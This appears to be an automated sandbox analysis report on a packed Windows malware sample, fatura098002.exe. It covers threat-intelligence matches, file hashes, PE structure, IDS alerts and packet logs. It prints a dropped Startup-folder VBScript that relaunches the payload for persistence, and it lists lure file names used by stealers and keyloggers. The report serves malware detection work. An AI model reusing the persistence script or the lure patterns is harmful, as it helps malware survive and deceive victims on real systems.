Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
12:30:38	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\gehlenite.vbs

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.114.97.3	GTA5-elamigos.exe	Get hash	malicious	Esquele Stealer	Browse	/api/get/dll
	DHL DOCS 2-0106-25.exe	Get hash	malicious	FormBook	Browse	www.uzshou.world/ricr/
	Order Inquiry.exe	Get hash	malicious	FormBook	Browse	www.cifasnc.info/8rr3/
	Gg6wivFINd.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	unasnetds.ru/eternalPython_RequestUpdateprocessAuthSqlTrafficTemporary.php
	Payment Receipt.exe	Get hash	malicious	FormBook	Browse	www.cifasnc.info/8rr3/
	dGhlYXB0Z3JvdXA=-free.exe	Get hash	malicious	Unknown	Browse	/api/get/free
	dGhlYXB0Z3JvdXA=-free.exe	Get hash	malicious	Unknown	Browse	/api/get/free
	RFQ 3100185 MAHAD.exe	Get hash	malicious	FormBook	Browse	www.rgenerousrs.store/o362/
	A2028041200SD.exe	Get hash	malicious	FormBook	Browse	www.beylikduzu616161.xyz/2nga/
	Delivery_Notification_00000260791.doc.js	Get hash	malicious	Unknown	Browse	radostdetym.ru/?ad=1JXSXybzEjjRJQDbVngTy7d8kEFAxmgmDN&id=rWoA9pTQhV1o4c5fjbOa-d26BGh3QU3-Bk0PqI4WnzM-5vl4IqKPymhrqkRpunF_PTHktMR-2qUlNAtnXA&rnd=45
132.226.247.73	Mv XIN HAI TONG 21_VESSEL'S_PARTICULARS.pdf.scr.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	MV DESPINA_VESSEL_DESCRIPTION.doc.scr.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	yxU3AgeVTi.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	W2k2NLSvja.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	FACT0987789000900.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	file.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Requested Documentation.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	checkip.dyndns.org/
	Dotc67890990.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Invoice DHL - AWB 2024 E4001 - 0000731.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	PURCHASE ORDER TRC-090971819130-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	Mv XIN HAI TONG 21_VESSEL'S_PARTICULARS.pdf.scr.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.97.3
	New order 2025.msg	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	188.114.97.3
	ENQ-0092025.doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	MV DESPINA_VESSEL_DESCRIPTION.doc.scr.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.97.3
	FORTUNE RICH_PARTICULARS.pdf.scr.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.97.3
	document pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	fiyati_teklif 615TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	yxU3AgeVTi.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	ITT # KRPBV2663 .doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	PI ITS15235.doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
checkip.dyndns.com	Mv XIN HAI TONG 21_VESSEL'S_PARTICULARS.pdf.scr.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.247.73
	New order 2025.msg	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	193.122.6.168
	ENQ-0092025.doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	MV DESPINA_VESSEL_DESCRIPTION.doc.scr.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.247.73
	FORTUNE RICH_PARTICULARS.pdf.scr.exe	Get hash	malicious	MassLogger RAT	Browse	158.101.44.242
	document pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	fiyati_teklif 615TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	yxU3AgeVTi.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	ITT # KRPBV2663 .doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	PI ITS15235.doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	158.101.44.242

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	random.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	Q1 Statements.html	Get hash	malicious	Unknown	Browse	104.18.95.41
	174.exe	Get hash	malicious	Xmrig	Browse	104.21.95.99
	https://www.dollartip.info/unsubscribe/?d=mdlandrec.net	Get hash	malicious	Unknown	Browse	172.66.0.227
	https://wetransfert-devis-factgfd.mystrikingly.com/	Get hash	malicious	Unknown	Browse	104.17.25.14
	spreadmalware.exe	Get hash	malicious	XWorm	Browse	104.21.32.1
	mail (4).eml	Get hash	malicious	Unknown	Browse	104.18.1.150
	https://www.dollartip.info/neuro	Get hash	malicious	Unknown	Browse	104.18.36.7
	Subscription_Renewal_Invoice_2025_HKVXTC.html	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	chu4rWexSX.exe	Get hash	malicious	LummaC	Browse	104.21.80.1
UTMEMUS	Mv XIN HAI TONG 21_VESSEL'S_PARTICULARS.pdf.scr.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.247.73
	miori.ppc.elf	Get hash	malicious	Unknown	Browse	132.224.247.83
	ENQ-0092025.doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	MV DESPINA_VESSEL_DESCRIPTION.doc.scr.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.247.73
	document pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	yxU3AgeVTi.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	ITT # KRPBV2663 .doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	kP8EgMorTr.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	armv5l.elf	Get hash	malicious	Unknown	Browse	132.244.2.45
	31.13.224.14-x86-2025-01-03T22_14_18.elf	Get hash	malicious	Mirai	Browse	132.226.42.231

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	Mv XIN HAI TONG 21_VESSEL'S_PARTICULARS.pdf.scr.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.97.3
	New order 2025.msg	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	188.114.97.3
	ENQ-0092025.doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	MV DESPINA_VESSEL_DESCRIPTION.doc.scr.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.97.3
	FORTUNE RICH_PARTICULARS.pdf.scr.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.97.3
	document pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	fiyati_teklif 615TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	yxU3AgeVTi.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	ITT # KRPBV2663 .doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	PI ITS15235.doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.97.3

Process:	C:\Users\user\Desktop\fatura098002.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Category:	dropped
Size (bytes):	721408
Entropy (8bit):	7.674628461369298
Encrypted:	false
SSDEEP:	12288:ssHzOUNUSB/o5LsI1uwajJ5yvv1l2zwQnz1UTvojh8mxm3V:viUmSB/o5d1ubcv+nz1UTgjumwF
MD5:	D029E152DEE67016FF65AD19DBEED64B
SHA1:	A3F1580A6448956AD15F970B5AFDC081F0FA1EDF
SHA-256:	6C7A1E93ABD57844906BEF4C7374BA4AB8DF35208DFAC4E5A01886D9E86C1986
SHA-512:	304B86ADB37D448543D648D92D0E2D60F66A67B84FC50C636A169C8AB2760AE252580ED5800FE93E66BD1ACD07393E0C3EE33DEBED53FCDF21B8249FD1D26841
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 53% Antivirus: Virustotal, Detection: 55%, Browse
Reputation:	low
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L...j.{g.........."..........@...... .............@.......................................@...@.......@........................$...................................................................$...............................................UPX0....................................UPX1................................@....rsrc....@.......4..................@..............................................................................................................................................................................................................................................................................................................................................3.91.UPX!....

C:\Users\user\AppData\Local\Temp\ageless

Download File

Process:	C:\Users\user\Desktop\fatura098002.exe
File Type:	data
Category:	dropped
Size (bytes):	93696
Entropy (8bit):	6.848735125481076
Encrypted:	false
SSDEEP:	1536:aVT0tGXv5qfUHTDI4khQCNweTPcDw3iR7s+G/T80gxZH:a0GXv54UH5khvweIDVS+G/T80WZH
MD5:	683BAE0F27382CA5FAF530B13A5CBA84
SHA1:	5E8D9EA5C89EDEC3B2A28A78B4AA46D5D18C435E
SHA-256:	13F7FC936911E59ACB86080A4BBEFB04542506635255EA62F85C9311E2601378
SHA-512:	2A56EF15DE8B28232FBEBB9216CBFF41445C4C4F01B87E1150E8CAA35481217809B135D4EBBE1599E5F75949331FFAEF720ACDB3B047BC08BB7E150EFA3112D5
Malicious:	false
Reputation:	low
Preview:	...IJ93CIPVE..CD.EQ1HYY0.I93CMPVE96CDZEQ1HYY0II93CMPVE96CDZE.1HYW/.G9.J.q.Du.b.2,".8+6W;(T. ,>8M.!!z7$_h07...j.."43k4;I`ZEQ1HYY`.I9.BNP....CDZEQ1HY.0KH22.MP2D96KDZEQ1H..1II.3CM.WE96.DZeQ1H[Y0MI93CMPVC96CDZEQ1.XY0KI93CMPTEY.CDJEQ!HYY0YI9#CMPVE9&CDZEQ1HYY0I..2C.PVE9.BD.@Q1HYY0II93CMPVE96CD.DQ=HYY0II93CMPVE96CDZEQ1HYY0II93CMPVE96CDZEQ1HYY0II93CMpVE16CDZEQ1HYY0Ai93.MPVE96CDZEQ.<<!DII9g!LPVe96C [EQ3HYY0II93CMPVE9.CD:k#B::Y0I.<3CM.WE90CDZ#P1HYY0II93CMPV.96.j( =^+YY<II93.LPVG96C([EQ1HYY0II93CM.VE{6CDZEQ1HYY0II93C}.WE96CD.EQ1JY\0..93..PVF96C.ZEW..YY.II93CMPVE96CDZEQ1HYY0II93CMPVE96CDZEQ1HYY0I.D.L..,J..DZEQ1HX[3MO1;CMPVE96C:ZEQwHYYpII9.CMPsE96.DZEu1HY'0IIG3CM4VE9DCDZ$Q1H.Y0I&93C#PVEG6CDDGy.HYS.oI;.cMP\E..0eZE[.IYY4:k93I.RVE=E`DZO.2HY]CmI99.IPVAJ.CDP.T1H]sjIJ.%EMPM.6CNZF.$NYY+co91ktPVO9.eDY.D7HYB.kI;.JMPRooE^DZCysHYSD@I91.GPVA.(Al.EQ;b{'#II=.Cgr(Q96GoZosO]YY4bI..=[PVA.6if$RQ1LrY.Oc[31.\V5:Y"DZCy.HYS..I95CgjV;76C@X*.1HS..sI.cCMVVmh6CBZo.16jY0Me>MpMPRn/HrDZA.70YY6:.93Ih.eE92k.ZE[1b.Y..I95Ce.VE?

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\gehlenite.vbs

Download File

Process:	C:\Users\user\AppData\Local\Halitherses\gehlenite.exe
File Type:	data
Category:	dropped
Size (bytes):	282
Entropy (8bit):	3.348709020388116
Encrypted:	false
SSDEEP:	6:DMM8lfm3OOQdUfclmVzUEZ+lX1xxxQ9BnriIM8lfQVn:DsO+vNlGQ1nxQjmA2n
MD5:	CD9D96DDB1E7B81ADF2162FEA30F68C2
SHA1:	74CC020241E91F711D1FBBD100866702D4807A78
SHA-256:	42B9141B92891237A1F3079D48BEDE92F00DEECBD310F205EA08B3FA52B5B34A
SHA-512:	852134218CDC414DBB9FA5E2DE846FEC1EEF6441C439658AFFCCE9B3AAB05CD5BB90DDA6D2C38B8952416EEC380A281F7558CC6B9CFDEBC1ED63D8A9E7FBDB75
Malicious:	true
Reputation:	low
Preview:	S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.t.o.t.t.i.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.H.a.l.i.t.h.e.r.s.e.s.\.g.e.h.l.e.n.i.t.e...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Entropy (8bit):	7.674628461369298
TrID:	Win32 Executable (generic) a (10002005/4) 99.39% UPX compressed Win32 Executable (30571/9) 0.30% Win32 EXE Yoda's Crypter (26571/9) 0.26% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02%
File name:	fatura098002.exe
File size:	721'408 bytes
MD5:	d029e152dee67016ff65ad19dbeed64b
SHA1:	a3f1580a6448956ad15f970b5afdc081f0fa1edf
SHA256:	6c7a1e93abd57844906bef4c7374ba4ab8df35208dfac4e5a01886d9e86c1986
SHA512:	304b86adb37d448543d648d92d0e2d60f66a67b84fc50c636a169c8ab2760ae252580ed5800fe93e66bd1acd07393e0c3ee33debed53fcdf21b8249fd1d26841
SSDEEP:	12288:ssHzOUNUSB/o5LsI1uwajJ5yvv1l2zwQnz1UTvojh8mxm3V:viUmSB/o5d1ubcv+nz1UTgjumwF
TLSH:	C8E4125BB181145BE926FEB704630E65D393AEA47879B0026E4F7E6042B72B3313758F
File Content Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....

File Icon


Icon Hash:	0d2d0d1723293133

Static PE Info

General

Entrypoint:	0x538720
Entrypoint Section:	UPX1
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x677BCF6A [Mon Jan 6 12:41:14 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	21371b611d91188d602926b15db6bd48

Entrypoint Preview

Instruction
pushad
mov esi, 004DC000h
lea edi, dword ptr [esi-000DB000h]
push edi
jmp 00007FA1F8CD9E0Dh
nop
mov al, byte ptr [esi]
inc esi
mov byte ptr [edi], al
inc edi
add ebx, ebx
jne 00007FA1F8CD9E09h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007FA1F8CD9DEFh
mov eax, 00000001h
add ebx, ebx
jne 00007FA1F8CD9E09h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc eax, eax
add ebx, ebx
jnc 00007FA1F8CD9E0Dh
jne 00007FA1F8CD9E2Ah
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007FA1F8CD9E21h
dec eax
add ebx, ebx
jne 00007FA1F8CD9E09h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc eax, eax
jmp 00007FA1F8CD9DD6h
add ebx, ebx
jne 00007FA1F8CD9E09h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc ecx, ecx
jmp 00007FA1F8CD9E54h
xor ecx, ecx
sub eax, 03h
jc 00007FA1F8CD9E13h
shl eax, 08h
mov al, byte ptr [esi]
inc esi
xor eax, FFFFFFFFh
je 00007FA1F8CD9E77h
sar eax, 1
mov ebp, eax
jmp 00007FA1F8CD9E0Dh
add ebx, ebx
jne 00007FA1F8CD9E09h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007FA1F8CD9DCEh
inc ecx
add ebx, ebx
jne 00007FA1F8CD9E09h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007FA1F8CD9DC0h
add ebx, ebx
jne 00007FA1F8CD9E09h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc ecx, ecx
add ebx, ebx
jnc 00007FA1F8CD9DF1h
jne 00007FA1F8CD9E0Bh
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jnc 00007FA1F8CD9DE6h
add ecx, 02h
cmp ebp, FFFFFB00h
adc ecx, 02h
lea edx, dword ptr [edi+ebp]
cmp ebp, FFFFFFFCh
jbe 00007FA1F8CD9E10h
mov al, byte ptr [edx]

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x18bedc	0x424	.rsrc
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x139000	0x52edc	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x18c300	0x14	.rsrc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x138904	0x18	UPX1
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x138924	0xa0	UPX1
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
UPX0	0x1000	0xdb000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
UPX1	0xdc000	0x5d000	0x5ca00	e3382d943caf5250cd9a11931000c4e3	False	0.9885949097503374	data	7.937224948818249	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x139000	0x54000	0x53400	04d5d86029a5ae3617667a8e34fbbcef	False	0.748070335960961	data	7.14723870615199	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x13951c	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0x139648	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0x139774	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0x1398a0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	English	Great Britain	0.45567375886524825
RT_ICON	0x139d0c	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	English	Great Britain	0.299953095684803
RT_ICON	0x13adb8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	English	Great Britain	0.2274896265560166
RT_ICON	0x13d364	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16384	English	Great Britain	0.18865139348134152
RT_ICON	0x141590	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 65536	English	Great Britain	0.13214243463858985
RT_MENU	0xecd98	0x50	data	English	Great Britain	1.1375
RT_STRING	0xecde8	0x594	data	English	Great Britain	1.007703081232493
RT_STRING	0xed37c	0x68a	data	English	Great Britain	1.0065710872162486
RT_STRING	0xeda08	0x490	data	English	Great Britain	1.009417808219178
RT_STRING	0xede98	0x5fc	data	English	Great Britain	1.0071801566579635
RT_STRING	0xee494	0x65c	data	English	Great Britain	1.0067567567567568
RT_STRING	0xeeaf0	0x466	data	English	Great Britain	1.0097690941385435
RT_STRING	0xeef58	0x158	data	English	Great Britain	1.0319767441860466
RT_RCDATA	0x151dbc	0x39bb4	data			1.0003425410626385
RT_GROUP_ICON	0x18b974	0x4c	data	English	Great Britain	0.8157894736842105
RT_GROUP_ICON	0x18b9c4	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x18b9dc	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x18b9f4	0x14	data	English	Great Britain	1.25
RT_VERSION	0x18ba0c	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x18baec	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
KERNEL32.DLL	LoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, ExitProcess
ADVAPI32.dll	GetAce
COMCTL32.dll	ImageList_Remove
COMDLG32.dll	GetSaveFileNameW
GDI32.dll	LineTo
IPHLPAPI.DLL	IcmpSendEcho
MPR.dll	WNetGetConnectionW
ole32.dll	CoGetObject
OLEAUT32.dll	OleLoadPicture
PSAPI.DLL	GetProcessMemoryInfo
SHELL32.dll	DragFinish
USER32.dll	GetDC
USERENV.dll	LoadUserProfileW
UxTheme.dll	IsThemeActive
VERSION.dll	VerQueryValueW
WININET.dll	FtpOpenFileW
WINMM.dll	timeGetTime
WSOCK32.dll	connect

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-08T12:30:39.139186+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.11	49702	132.226.247.73	80	TCP
2025-01-08T12:30:50.248524+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.11	49704	132.226.247.73	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 8, 2025 12:30:37.182787895 CET	49702	80	192.168.2.11	132.226.247.73
Jan 8, 2025 12:30:37.187597036 CET	80	49702	132.226.247.73	192.168.2.11
Jan 8, 2025 12:30:37.187685966 CET	49702	80	192.168.2.11	132.226.247.73
Jan 8, 2025 12:30:37.188189030 CET	49702	80	192.168.2.11	132.226.247.73
Jan 8, 2025 12:30:37.192934990 CET	80	49702	132.226.247.73	192.168.2.11
Jan 8, 2025 12:30:38.874869108 CET	80	49702	132.226.247.73	192.168.2.11
Jan 8, 2025 12:30:38.879465103 CET	49702	80	192.168.2.11	132.226.247.73
Jan 8, 2025 12:30:38.884274960 CET	80	49702	132.226.247.73	192.168.2.11
Jan 8, 2025 12:30:39.090188026 CET	80	49702	132.226.247.73	192.168.2.11
Jan 8, 2025 12:30:39.099421024 CET	49703	443	192.168.2.11	188.114.97.3
Jan 8, 2025 12:30:39.099461079 CET	443	49703	188.114.97.3	192.168.2.11
Jan 8, 2025 12:30:39.099519014 CET	49703	443	192.168.2.11	188.114.97.3
Jan 8, 2025 12:30:39.108333111 CET	49703	443	192.168.2.11	188.114.97.3
Jan 8, 2025 12:30:39.108346939 CET	443	49703	188.114.97.3	192.168.2.11
Jan 8, 2025 12:30:39.139185905 CET	49702	80	192.168.2.11	132.226.247.73
Jan 8, 2025 12:30:39.607132912 CET	443	49703	188.114.97.3	192.168.2.11
Jan 8, 2025 12:30:39.607223034 CET	49703	443	192.168.2.11	188.114.97.3
Jan 8, 2025 12:30:39.612306118 CET	49703	443	192.168.2.11	188.114.97.3
Jan 8, 2025 12:30:39.612325907 CET	443	49703	188.114.97.3	192.168.2.11
Jan 8, 2025 12:30:39.612685919 CET	443	49703	188.114.97.3	192.168.2.11
Jan 8, 2025 12:30:39.654772997 CET	49703	443	192.168.2.11	188.114.97.3
Jan 8, 2025 12:30:39.674115896 CET	49703	443	192.168.2.11	188.114.97.3
Jan 8, 2025 12:30:39.719335079 CET	443	49703	188.114.97.3	192.168.2.11
Jan 8, 2025 12:30:39.783183098 CET	443	49703	188.114.97.3	192.168.2.11
Jan 8, 2025 12:30:39.783265114 CET	443	49703	188.114.97.3	192.168.2.11
Jan 8, 2025 12:30:39.783329010 CET	49703	443	192.168.2.11	188.114.97.3
Jan 8, 2025 12:30:39.793802023 CET	49703	443	192.168.2.11	188.114.97.3
Jan 8, 2025 12:30:49.314035892 CET	49704	80	192.168.2.11	132.226.247.73
Jan 8, 2025 12:30:49.318933010 CET	80	49704	132.226.247.73	192.168.2.11
Jan 8, 2025 12:30:49.319004059 CET	49704	80	192.168.2.11	132.226.247.73
Jan 8, 2025 12:30:49.319269896 CET	49704	80	192.168.2.11	132.226.247.73
Jan 8, 2025 12:30:49.325790882 CET	80	49704	132.226.247.73	192.168.2.11
Jan 8, 2025 12:30:49.988763094 CET	80	49704	132.226.247.73	192.168.2.11
Jan 8, 2025 12:30:49.994328022 CET	49704	80	192.168.2.11	132.226.247.73
Jan 8, 2025 12:30:49.999547958 CET	80	49704	132.226.247.73	192.168.2.11
Jan 8, 2025 12:30:50.202946901 CET	80	49704	132.226.247.73	192.168.2.11
Jan 8, 2025 12:30:50.205698013 CET	49705	443	192.168.2.11	188.114.97.3
Jan 8, 2025 12:30:50.205750942 CET	443	49705	188.114.97.3	192.168.2.11
Jan 8, 2025 12:30:50.205836058 CET	49705	443	192.168.2.11	188.114.97.3
Jan 8, 2025 12:30:50.213799000 CET	49705	443	192.168.2.11	188.114.97.3
Jan 8, 2025 12:30:50.213828087 CET	443	49705	188.114.97.3	192.168.2.11
Jan 8, 2025 12:30:50.248523951 CET	49704	80	192.168.2.11	132.226.247.73
Jan 8, 2025 12:30:50.687336922 CET	443	49705	188.114.97.3	192.168.2.11
Jan 8, 2025 12:30:50.687483072 CET	49705	443	192.168.2.11	188.114.97.3
Jan 8, 2025 12:30:50.689097881 CET	49705	443	192.168.2.11	188.114.97.3
Jan 8, 2025 12:30:50.689105988 CET	443	49705	188.114.97.3	192.168.2.11
Jan 8, 2025 12:30:50.689395905 CET	443	49705	188.114.97.3	192.168.2.11
Jan 8, 2025 12:30:50.732914925 CET	49705	443	192.168.2.11	188.114.97.3
Jan 8, 2025 12:30:50.740823984 CET	49705	443	192.168.2.11	188.114.97.3
Jan 8, 2025 12:30:50.787333012 CET	443	49705	188.114.97.3	192.168.2.11
Jan 8, 2025 12:30:50.866111040 CET	443	49705	188.114.97.3	192.168.2.11
Jan 8, 2025 12:30:50.866193056 CET	443	49705	188.114.97.3	192.168.2.11
Jan 8, 2025 12:30:50.866245031 CET	49705	443	192.168.2.11	188.114.97.3
Jan 8, 2025 12:30:50.869752884 CET	49705	443	192.168.2.11	188.114.97.3
Jan 8, 2025 12:31:44.091295004 CET	80	49702	132.226.247.73	192.168.2.11
Jan 8, 2025 12:31:44.091443062 CET	49702	80	192.168.2.11	132.226.247.73
